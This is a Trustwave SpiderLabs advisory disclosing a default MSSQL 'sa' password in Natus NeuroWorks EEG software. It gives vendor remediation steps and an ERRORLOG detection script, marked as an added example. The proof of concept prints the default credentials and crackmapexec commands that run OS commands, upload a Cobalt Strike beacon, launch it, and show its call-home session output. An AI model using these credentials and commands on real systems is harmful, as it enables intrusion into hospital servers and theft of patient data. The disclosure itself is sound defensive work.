Trustwave SpiderLabs Security Advisory TWSL2023-006:
Default MSSQL Database Password in Natus NeuroWorks EEG Software
Published: 11/07/2023
Version: 1.0
Vendor: Natus https://natus.com/products-services/natus-neuroworks-eeg-software
Product: NeuroWorks EEG Software
Version affected: Prior to 8.4 GMA3
Product description:
The Natus NeuroWorks platform simplifies the process of collecting, monitoring,
trending and managing data for routine EEG testing, ambulatory EEG, long-term
monitoring, ICU monitoring, and research studies. NeuroWorks systems are
scalable to meet the needs of private practice clinics, hospitals, large
teaching facilities and EEG service providers. Natus NeuroWorks is a
cutting-edge, single solution for EEG, LTM, ICU, Sleep, and Research Studies,
exhibiting an advanced software for clinical excellence.
The Microsoft SQL-based NeuroWorks database is a powerful tool that simplifies
the management of patient, study and laboratory data. Filter studies by date,
status, diagnosis, or use any built-in editable field to create custom filters
for your unique needs. Track outcomes and filter by statistical indices that are
calculated in the reports. The distributed database automatically updates system
settings across the network to ensure that all workstations have current lab
settings.
Finding 1: Default Password for Natus NeuroWorks EEG Software MSSQL Database
Credit: John Jackson of Trustwave
Natus NeuroWorks EEG Software utilizes their own custom MSSQL configuration and
database for the management of medical research studies connected to the testing
and monitoring software implemented via the Natus NeuroWorks platform. By
default, the MSSQL service utilizes the administrative username 'sa' coupled
with the password 'xltek'. An attacker can utilize the default credentials to
access stored sensitive data or perform administrative functions and MSSQL
queries. In addition, an attacker on the local network could potentially
leverage the credentials to access the file system of the server and perform
read, write, and execution functions on the disk. Natus recommends against
changing the default password as it will disable MigrateDB's ability to
authenticate silently in instances of new virtual database creation.
Proof of Concept/Summary:
While the instance of default credentials is properly documented within the "XL
Security Site Administrator Reference" guide, Natus specifically recommends
against changing the default credentials.
The document specifically states:
"Each instance of SQL Server also has a system administrator username ('sa').
The default password is 'xltek'; however it can be changed for each instance of
SQL Server. We strongly recommend using the default password for local SQL Server
instances".
Natus recommends against changing the password, because of their MigrateDB
function. The document goes on to say: "MigrateDB is also called silently when a
new 'virtual database' is created through Natus Database - XLDB. In this case,
MigrateDB will not prompt the user for the 'sa' password. If the password for
'sa' has been altered on the local machine from its default, the creation of a
new virtual server will fail".
They do, however, recommend a workaround: set the password back to xltek while
creating a new virtual database, and then change it again once creation is
complete.
## Running the command 'whoami' using default credentials
└─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'whoami'
MSSQL SERVERNAME 1433 SERVERNAME [*] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME)
MSSQL SERVERNAME 1433 SERVERNAME [-] SERVERNAME\sa:xltek table users has no column named pillaged_from_computerid
MSSQL SERVERNAME 1433 SERVERNAME [+] Executed command via mssqlexec
MSSQL SERVERNAME 1433 SERVERNAME --------------------------------------------------------------------------------
MSSQL SERVERNAME 1433 SERVERNAME nt authority\network service
## Writing a cobalt strike beacon to a local windows directory
└─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth --put-file /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe C:\\Temp\\Events\\armsvc.exe
MSSQL SERVERNAME 1433 SERVERNAME [*] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME)
MSSQL SERVERNAME 1433 SERVERNAME [-] SERVERNAME\sa:xltek table users has no column named pillaged_from_computerid
MSSQL SERVERNAME 1433 SERVERNAME [*] Copy /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe to C:\Temp\Events\armsvc.exe
MSSQL SERVERNAME 1433 SERVERNAME [*] Size is 409088 bytes
MSSQL SERVERNAME 1433 SERVERNAME [+] File has been uploaded on the remote machine
└─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'dir C:\Temp\Events\'
MSSQL SERVERNAME 1433 SERVERNAME [*] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME)
MSSQL SERVERNAME 1433 SERVERNAME [-] SERVERNAME\sa:xltek table users has no column named pillaged_from_computerid
MSSQL SERVERNAME 1433 SERVERNAME [+] Executed command via mssqlexec
MSSQL SERVERNAME 1433 SERVERNAME --------------------------------------------------------------------------------
MSSQL SERVERNAME 1433 SERVERNAME Volume in drive C is Windows
MSSQL SERVERNAME 1433 SERVERNAME Volume Serial Number is A050-B8DA
MSSQL SERVERNAME 1433 SERVERNAME Directory of C:\Temp\Events
MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM .
MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM ..
MSSQL SERVERNAME 1433 SERVERNAME 06/23/2023 02:31 PM 409,088 armsvc.exe
MSSQL SERVERNAME 1433 SERVERNAME 1 File(s) 409,088 bytes
MSSQL SERVERNAME 1433 SERVERNAME 2 Dir(s) 34,903,302,144 bytes free
## Triggering the cobalt strike beacon
└─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'cmd.exe /c start C:\Temp\Events\armsvc.exe'
MSSQL SERVERNAME 1433 SERVERNAME [*] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME)
MSSQL SERVERNAME 1433 SERVERNAME [-] SERVERNAME\sa:xltek table users has no column named pillaged_from_computerid
MSSQL SERVERNAME 1433 SERVERNAME [+] Executed command via mssqlexec
MSSQL SERVERNAME 1433 SERVERNAME None
## Beacon command execution proof
beacon> sleep 0
[*] Tasked beacon to become interactive
[+] host called home, sent: 16 bytes
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\NETWORK SERVICE
beacon> run systeminfo
[*] Tasked beacon to run: systeminfo
[+] host called home, sent: 28 bytes
[+] received output:
Host Name: SERVERNAME
OS Name: Microsoft Windows 10 Enterprise 2016 LTSB
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: XXXXX-XXXXX-XXXXX-XXXXX
Original Install Date: 6/6/2017, 5:39:30 PM
System Boot Time: 6/17/2023, 2:07:18 PM
System Manufacturer: Dell Inc.
System Model: OptiPlex 5050
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3312 Mhz
BIOS Version: Dell Inc. 1.11.1, 11/29/2018
Windows Directory: C:\windows
System Directory: C:\windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 8,051 MB
Available Physical Memory: 5,344 MB
Virtual Memory: Max Size: 16,243 MB
Virtual Memory: Available: 13,210 MB
Virtual Memory: In Use: 3,033 MB
Page File Location(s): C:\pagefile.sys
Domain: REDACTED FOR PRIVACY
Logon Server: N/A
Hotfix(s): 6 Hotfix(s) Installed.
[01]: KB4013418
[02]: KB4033631
[03]: KB4049411
[04]: KB4103729
[05]: KB4132216
[06]: KB4103720
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) Ethernet Connection (5) I219-V
Connection Name: LAN
DHCP Enabled: Yes
DHCP Server: X.X.X.X
IP address(es)
[01]: X.X.X.X
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
Virtualization Enabled In Firmware: Yes
Second Level Address Translation: Yes
Data Execution Prevention Available: Yes
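The activity shown above leaves traces in the SQL Server ERRORLOG: a SQL-authenticated 'sa' login from a remote client, followed by xp_cmdshell being switched on for OS command execution. The following detection script is an added example written for this advisory, not Trustwave's or Natus's code; the log lines are constructed samples, and treating 'sa' logins from the local machine as expected platform tooling (MigrateDB) rather than an alert is an assumption.

```python
import re
from typing import Dict, List

# Constructed sample SQL Server ERRORLOG excerpt (not taken from the advisory).
# Message formats follow what SQL Server writes when login auditing covers
# successful logins and when sp_configure changes an option.
SAMPLE_ERRORLOG = """\
2023-06-23 14:30:58.10 Logon       Login succeeded for user 'NT AUTHORITY\\SYSTEM'. Connection made using Windows authentication. [CLIENT: <local machine>]
2023-06-23 14:31:02.44 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 10.10.20.7]
2023-06-23 14:31:02.91 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-06-23 14:31:03.02 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-06-23 14:35:10.00 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: <local machine>]
2023-06-23 14:36:00.00 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.20.9]
"""

LOGIN_OK_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) Logon\s+"
    r"Login succeeded for user '(?P<user>[^']+)'\. "
    r"Connection made using (?P<auth>SQL Server|Windows) authentication\. "
    r"\[CLIENT: (?P<client>[^\]]+)\]"
)
XP_CMDSHELL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) spid\d+\s+"
    r"Configuration option 'xp_cmdshell' changed from 0 to 1"
)


def analyze_errorlog(text: str) -> Dict[str, List[Dict[str, str]]]:
    """Return the events a defender should review on a NeuroWorks SQL host.

    remote_sa_logins: 'sa' used SQL Server authentication from a client other
        than the local machine. Local 'sa' logins are reported separately, on
        the assumption that they come from the platform's own tooling.
    xp_cmdshell_enabled: the option used for OS command execution was turned on.
    """
    findings = {"remote_sa_logins": [], "local_sa_logins": [], "xp_cmdshell_enabled": []}
    for line in text.splitlines():
        m = LOGIN_OK_RE.match(line)
        if m and m["user"].lower() == "sa" and m["auth"] == "SQL Server":
            bucket = "local_sa_logins" if m["client"] == "<local machine>" else "remote_sa_logins"
            findings[bucket].append({"ts": m["ts"], "client": m["client"]})
            continue
        m = XP_CMDSHELL_RE.match(line)
        if m:
            findings["xp_cmdshell_enabled"].append({"ts": m["ts"]})
    return findings


if __name__ == "__main__":
    for kind, events in analyze_errorlog(SAMPLE_ERRORLOG).items():
        for ev in events:
            print(f"{kind}: {ev}")
```

Successful logins only appear in the ERRORLOG when the instance's login auditing is set to record both failed and successful logins; failed 'sa' attempts are logged by default.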
Vendor Response:
The vendor has revised the Administrator Reference document and no longer
endorses use of the default password. Instead, the vendor strongly recommends
that all users change the default SQL credentials. Doing so requires updating
the software to use the Credentials Cache feature introduced in version 8.4
GMA3. The technical service team will provide the revised documentation to
customers on request, and in the future it will be integrated into the
NeuroWorks software installation package.
The vendor has additionally released a security advisory regarding this threat.
You can access the security bulletin at this link:
https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf
Remediation Steps:
Upgrade to GMA3 version 8.4 or a higher version to enable the credential cache
feature and update the default SQL credentials.
Revision History:
06/27/2023 - Trustwave disclosed vulnerability to vendor
07/07/2023 - Vendor provides Trustwave with preliminary version of the updated documentation
07/18/2023 - Vendor has provided Trustwave with remediation plan
10/20/2023 - Vendor publishes security bulletin
11/07/2023 - Advisory published
References
1. https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf
About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security
risk. With cloud and managed security services, integrated technologies and a
team of security experts, ethical hackers and researchers, Trustwave enables
businesses to transform the way they manage their information security and
compliance programs. More than three million businesses are enrolled in the
Trustwave TrustKeeper® cloud platform, through which Trustwave delivers
automated, efficient and cost-effective threat, vulnerability and compliance
management. Trustwave is headquartered in Chicago, with customers in 96
countries. For more information about Trustwave, visit
https://www.trustwave.com.
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.